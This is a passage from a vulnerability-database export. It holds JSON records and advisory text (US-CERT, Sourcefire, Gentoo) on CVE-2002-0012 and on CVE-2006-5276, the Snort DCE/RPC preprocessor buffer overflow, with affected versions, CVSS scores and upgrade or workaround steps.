          },
          {
            "db": "BID",
            "id": "4203"
          },
          {
            "db": "BID",
            "id": "4088"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          },
          {
            "db": "NVD",
            "id": "CVE-2002-0012"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#107186",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#854306",
            "ident": null
          },
          {
            "db": "BID",
            "id": "89608",
            "ident": null
          },
          {
            "db": "BID",
            "id": "89661",
            "ident": null
          },
          {
            "db": "BID",
            "id": "5043",
            "ident": null
          },
          {
            "db": "BID",
            "id": "4732",
            "ident": null
          },
          {
            "db": "BID",
            "id": "4203",
            "ident": null
          },
          {
            "db": "BID",
            "id": "4088",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200202-007",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2002-0012",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2002-01-16T00:00:00",
            "db": "CERT/CC",
            "id": "VU#107186",
            "ident": null
          },
          {
            "date": "2002-02-12T00:00:00",
            "db": "CERT/CC",
            "id": "VU#854306",
            "ident": null
          },
          {
            "date": "2002-03-08T00:00:00",
            "db": "BID",
            "id": "89608",
            "ident": null
          },
          {
            "date": "2002-03-08T00:00:00",
            "db": "BID",
            "id": "89661",
            "ident": null
          },
          {
            "date": "2002-06-18T00:00:00",
            "db": "BID",
            "id": "5043",
            "ident": null
          },
          {
            "date": "2002-05-13T00:00:00",
            "db": "BID",
            "id": "4732",
            "ident": null
          },
          {
            "date": "2002-02-27T00:00:00",
            "db": "BID",
            "id": "4203",
            "ident": null
          },
          {
            "date": "2002-02-12T00:00:00",
            "db": "BID",
            "id": "4088",
            "ident": null
          },
          {
            "date": "2002-02-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200202-007",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2002-000033",
            "ident": null
          },
          {
            "date": "2002-02-13T05:00:00",
            "db": "NVD",
            "id": "CVE-2002-0012",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2007-11-07T00:00:00",
            "db": "CERT/CC",
            "id": "VU#107186",
            "ident": null
          },
          {
            "date": "2007-11-07T00:00:00",
            "db": "CERT/CC",
            "id": "VU#854306",
            "ident": null
          },
          {
            "date": "2002-03-08T00:00:00",
            "db": "BID",
            "id": "89608",
            "ident": null
          },
          {
            "date": "2002-03-08T00:00:00",
            "db": "BID",
            "id": "89661",
            "ident": null
          },
          {
            "date": "2009-07-11T13:56:00",
            "db": "BID",
            "id": "5043",
            "ident": null
          },
          {
            "date": "2002-05-13T00:00:00",
            "db": "BID",
            "id": "4732",
            "ident": null
          },
          {
            "date": "2009-07-11T10:56:00",
            "db": "BID",
            "id": "4203",
            "ident": null
          },
          {
            "date": "2009-07-11T10:56:00",
            "db": "BID",
            "id": "4088",
            "ident": null
          },
          {
            "date": "2005-10-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200202-007",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2002-000033",
            "ident": null
          },
          {
            "date": "2025-04-03T01:03:51.193000",
            "db": "NVD",
            "id": "CVE-2002-0012",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "89608"
          },
          {
            "db": "BID",
            "id": "89661"
          },
          {
            "db": "BID",
            "id": "5043"
          },
          {
            "db": "BID",
            "id": "4732"
          },
          {
            "db": "BID",
            "id": "4203"
          },
          {
            "db": "BID",
            "id": "4088"
          }
        ],
        "trust": 1.8
      },
      "title": {
        "_id": null,
        "data": "Multiple vulnerabilities in SNMPv1 trap handling",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#107186"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "Input Validation Error",
        "sources": [
          {
            "db": "BID",
            "id": "89608"
          },
          {
            "db": "BID",
            "id": "89661"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200702-0378

    Vulnerability from variot - Updated: 2026-04-10 23:50

    Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

                     National Cyber Alert System
    
               Technical Cyber Security Alert TA07-050A
    

    Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow

    Original release date: February 19, 2007 Last revised: -- Source: US-CERT

    Systems Affected

     * Snort 2.6.1, 2.6.1.1, and 2.6.1.2
     * Snort 2.7.0 beta 1
     * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with
       SEUs prior to SEU 64
     * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x,
       and 4.6x with SEUs prior to SEU 64
    

    Other products that use Snort or Snort components may be affected.

    I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules.

    The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake.

    US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS.

    II.

    III. Solution

    Upgrade

    Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site.

    Disable the DCE/RPC Preprocessor

    To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems):

     [/etc/snort.conf]
     ... 
     #preprocessor dcerpc...
    

    Restart Snort for the change to take effect.

    Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS.

    IV. References

     * US-CERT Vulnerability Note VU#196240 -
       <http://www.kb.cert.org/vuls/id/196240>
    
     * Sourcefire Advisory 2007-02-19 -
       <http://www.snort.org/docs/advisory-2007-02-19.html>
    
     * Sourcefire Support Login - <https://support.sourcefire.com/>
    
     * Sourcefire Snort Release Notes for 2.6.1.3 -
       <http://www.snort.org/docs/release_notes/release_notes_2613.txt>
    
     * Snort downloads - <http://www.snort.org/dl/>
    
     * DCE/RPC Preprocessor -
       <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html>
    
     * IBM Internet Security Systems Protection Advisory -
       <http://iss.net/threats/257.html>
    
     * CVE-2006-5276 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276>
    

    The most recent version of this document can be found at:

     <http://www.us-cert.gov/cas/techalerts/TA07-050A.html>
    

    Feedback can be directed to US-CERT Technical Staff. Please send email to cert@cert.org with "TA07-050A Feedback VU#196240" in the subject.


    For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.


    Produced 2007 by US-CERT, a government organization.

    Terms of use:

     <http://www.us-cert.gov/legal.html>
    

    Revision History

    February 19, 2007: Initial Release

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)

    iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007

    Summary:

    Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue.

    Mitigating Factors:

    Users who have disabled the DCE/RPC preprocessor are not vulnerable.

    Recommended Actions:

    • Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately.
    • Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2.

    Workarounds:

    Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor.

    Detecting Attacks Against This Vulnerability:

    Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability.

    Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited.

    Acknowledgments:

    Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it.


    Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV


    Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce .

    Resolution

    All Snort users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3"
    

    References

    [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200703-01.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "snort",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "snort",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "snort",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "snort",
            "version": "2.6.1.1"
          },
          {
            "_id": null,
            "model": "snort",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "snort",
            "version": "2.7_beta1"
          },
          {
            "_id": null,
            "model": "snort",
            "scope": "eq",
            "trust": 1.4,
            "vendor": "snort",
            "version": "2.6.1.2"
          },
          {
            "_id": null,
            "model": "snort",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "snort",
            "version": "2.6.1.2"
          },
          {
            "_id": null,
            "model": "intrusion sensor",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sourcefire",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "intrusion sensor",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sourcefire",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "intrusion sensor",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sourcefire",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "snort",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sourcefire",
            "version": null
          },
          {
            "_id": null,
            "model": "intrusion sensor",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sourcefire",
            "version": "4.5.x"
          },
          {
            "_id": null,
            "model": "snort",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "snort",
            "version": "2.7.0 beta 1"
          },
          {
            "_id": null,
            "model": "intrusion sensor",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sourcefire",
            "version": "for crossbeam version 4.1.x"
          },
          {
            "_id": null,
            "model": "intrusion sensor",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "sourcefire",
            "version": "4.6x of  seu 64 earlier versions"
          },
          {
            "_id": null,
            "model": "intrusion sensor",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sourcefire",
            "version": "version 4.1.x"
          },
          {
            "_id": null,
            "model": "project snort",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "snort",
            "version": "2.6.1.2"
          },
          {
            "_id": null,
            "model": "project snort",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "snort",
            "version": "2.6.1.1"
          },
          {
            "_id": null,
            "model": "project snort",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "snort",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "project snort beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "snort",
            "version": "2.7.01"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "fedora core7",
            "scope": null,
            "trust": 0.3,
            "vendor": "redhat",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "networks threat protection system intrusion sensor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "networks threat protection system intrusion sensor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "networks threat protection system intrusion sensor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "networks threat protection system defense center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "networks threat protection system defense center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "networks threat protection system defense center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "net-analyzer/snort",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "project snort",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "snort",
            "version": "2.6.1.3"
          },
          {
            "_id": null,
            "model": "net-analyzer/snort",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "2.6.1.3"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#196240"
          },
          {
            "db": "BID",
            "id": "22616"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-5276"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:snort:snort",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:sourcefire:intrusion_sensor",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Neel Mehta",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2006-5276",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-5276",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-21384",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-5276",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#196240",
                "trust": 0.8,
                "value": "23.63"
              },
              {
                "author": "NVD",
                "id": "CVE-2006-5276",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200702-347",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-21384",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2006-5276",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#196240"
          },
          {
            "db": "VULHUB",
            "id": "VHN-21384"
          },
          {
            "db": "VULMON",
            "id": "CVE-2006-5276"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200702-347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-5276"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted \u0027DCE\u0027 and \u0027RPC\u0027 network packets. \nAn attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n                     National Cyber Alert System\n\n               Technical Cyber Security Alert TA07-050A\n\n\nSourcefire Snort DCE/RPC Preprocessor Buffer Overflow\n\n   Original release date: February 19, 2007\n   Last revised: --\n   Source: US-CERT\n\n\nSystems Affected\n\n     * Snort 2.6.1, 2.6.1.1, and 2.6.1.2\n     * Snort 2.7.0 beta 1\n     * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with\n       SEUs prior to SEU 64\n     * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x,\n       and 4.6x with SEUs prior to SEU 64\n\n   Other products that use Snort or Snort components may be affected. \n\n\nI. The DCE/RPC\n   preprocessor reassembles fragmented SMB and DCE/RPC traffic before\n   passing data to the Snort rules. \n\n   The vulnerable code does not properly reassemble certain types of\n   SMB and DCE/RPC packets. An attacker could exploit this\n   vulnerability by sending a specially crafted TCP packet to a host\n   or network monitored by Snort. The DCE/RPC preprocessor is enabled\n   by default, and it is not necessary for an attacker to complete a\n   TCP handshake. \n\n   US-CERT is tracking this vulnerability as VU#196240. This\n   vulnerability has been assigned CVE number CVE-2006-5276. Further\n   information is available in advisories from Sourcefire and ISS. \n\n\nII. \n\n\nIII. Solution\n\nUpgrade\n\n   Snort 2.6.1.3 is available from the Snort download site. Sourcefire\n   customers should visit the Sourcefire Support Login site. \n\nDisable the DCE/RPC Preprocessor\n\n   To disable the DCE/RPC preprocessor, comment out the line that loads\n   the preprocessor in the Snort configuration file (typically\n   /etc/snort.conf on UNIX and Linux systems):\n\n     [/etc/snort.conf]\n     ... \n     #preprocessor dcerpc... \n   \n   Restart Snort for the change to take effect. \n\n   Disabling the preprocessor will prevent Snort from reassembling\n   fragmented SMB and DCE/RPC packets. This may allow attacks to evade\n   the IDS. \n\n\nIV. References\n\n     * US-CERT Vulnerability Note VU#196240 -\n       \u003chttp://www.kb.cert.org/vuls/id/196240\u003e\n\n     * Sourcefire Advisory 2007-02-19 -\n       \u003chttp://www.snort.org/docs/advisory-2007-02-19.html\u003e\n\n     * Sourcefire Support Login - \u003chttps://support.sourcefire.com/\u003e\n\n     * Sourcefire Snort Release Notes for 2.6.1.3 -\n       \u003chttp://www.snort.org/docs/release_notes/release_notes_2613.txt\u003e\n\n     * Snort downloads - \u003chttp://www.snort.org/dl/\u003e\n\n     * DCE/RPC Preprocessor -\n       \u003chttp://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html\u003e\n\n     * IBM Internet Security Systems Protection Advisory -\n       \u003chttp://iss.net/threats/257.html\u003e\n\n     * CVE-2006-5276 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276\u003e\n\n\n ____________________________________________________________________\n\n   The most recent version of this document can be found at:\n\n     \u003chttp://www.us-cert.gov/cas/techalerts/TA07-050A.html\u003e\n ____________________________________________________________________\n\n   Feedback can be directed to US-CERT Technical Staff. Please send\n   email to \u003ccert@cert.org\u003e with \"TA07-050A Feedback VU#196240\" in the\n   subject. \n ____________________________________________________________________\n\n   For instructions on subscribing to or unsubscribing from this\n   mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n   Produced 2007 by US-CERT, a government organization. \n\n   Terms of use:\n\n     \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n   February 19, 2007:  Initial Release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP\nqulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq\n+kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6\nOuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w\nRSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg\n+EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg==\n=T7v8\n-----END PGP SIGNATURE-----\n. February 19, 2007\n\nSummary:\n\nSourcefire has learned of a remotely exploitable vulnerability in the \nSnort DCE/RPC preprocessor. Sourcefire \nhas prepared updates for Snort open-source software to address this issue. \n\n\nMitigating Factors:\n\nUsers who have disabled the DCE/RPC preprocessor are not vulnerable. \n\n\nRecommended Actions:\n\n* Open-source Snort 2.6.1.x users are advised to upgrade to Snort \n2.6.1.3 (or later) immediately. \n* Open-source Snort 2.7 beta users are advised to mitigate this issue by \ndisabling the DCE/RPC preprocessor. \n   This issue will be resolved in Snort 2.7 beta 2. \n\n\nWorkarounds:\n\nSnort users who cannot upgrade immediately are advised to disable the \nDCE/RPC preprocessor by removing the DCE/RPC preprocessor directives \nfrom snort.conf and restarting Snort. However, be advised that disabling \nthe DCE/RPC preprocessor reduces detection capabilities for attacks in \nDCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC \npreprocessor. \n\n\nDetecting Attacks Against This Vulnerability:\n\nSourcefire will be releasing a rule pack that provides detection for \nattacks against this vulnerability. \n\nHas Sourcefire received any reports that this vulnerability has been \nexploited?\n- No. Sourcefire has not received any reports that this vulnerability \nhas been exploited. \n\n\nAcknowledgments:\n\nSourcefire would like to thank Neel Mehta from IBM X-Force for reporting \nthis issue and working with us to resolve it. \n\n\n-------------------------------------------------------------------------\nTake Surveys. Earn Cash. Influence the Future of IT\nJoin SourceForge.net\u0027s Techsay panel and you\u0027ll get the chance to share your\nopinions on IT \u0026 business topics through brief surveys-and earn cash\nhttp://www.techsay.com/default.php?page=join.php\u0026p=sourceforge\u0026CID=DEVDEV\n_______________________________________________\nSnort-announce mailing list\nSnort-announce@lists.sourceforge.net\nhttps://lists.sourceforge.net/lists/listinfo/snort-announce\n. \n\nResolution\n==========\n\nAll Snort users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/snort-2.6.1.3\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2006-5276\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200703-01.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2007 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-5276"
          },
          {
            "db": "CERT/CC",
            "id": "VU#196240"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000170"
          },
          {
            "db": "BID",
            "id": "22616"
          },
          {
            "db": "VULHUB",
            "id": "VHN-21384"
          },
          {
            "db": "VULMON",
            "id": "CVE-2006-5276"
          },
          {
            "db": "PACKETSTORM",
            "id": "54569"
          },
          {
            "db": "PACKETSTORM",
            "id": "54522"
          },
          {
            "db": "PACKETSTORM",
            "id": "54834"
          }
        ],
        "trust": 3.06
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=3609",
            "trust": 0.4,
            "type": "exploit"
          },
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-21384",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-21384"
          },
          {
            "db": "VULMON",
            "id": "CVE-2006-5276"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#196240",
            "trust": 3.8
          },
          {
            "db": "NVD",
            "id": "CVE-2006-5276",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "22616",
            "trust": 2.9
          },
          {
            "db": "USCERT",
            "id": "TA07-050A",
            "trust": 2.7
          },
          {
            "db": "SECUNIA",
            "id": "24272",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "24190",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "24235",
